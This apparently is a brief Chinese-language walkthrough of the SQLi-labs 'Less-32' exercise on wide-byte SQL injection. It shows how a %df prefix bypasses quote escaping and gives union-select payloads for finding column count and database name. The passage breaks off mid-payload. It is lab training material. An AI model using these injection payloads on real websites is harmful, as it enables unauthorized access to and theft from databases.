目录
Less-32(宽字节注入)
接下来进入到宽字节注入。
宽字节注入原理:参考 宽字节注入
我们正常输入id=1,返回第一组数据;输入id=1’,同样拿到了数据,并且通过提示发现 ’ 被转义。在了解宽字节注入原理之后,我们输入:
id=1%df'
出现语法报错,说明存在sql漏洞;这时我们将后面的语句注释:
得到第一组数据。
接下来就是正常操作了。
获得字段数及回显位置并查库:
?id=1%df' order by 3 --+
?id=-1%df' union select 1,2, 3 --+
?id=-1%df' union select 1,2, database() --+
查表:
这里注意,因为 ’ 被过滤的缘故,所以库名使用hex编码,避免使用’
?id=-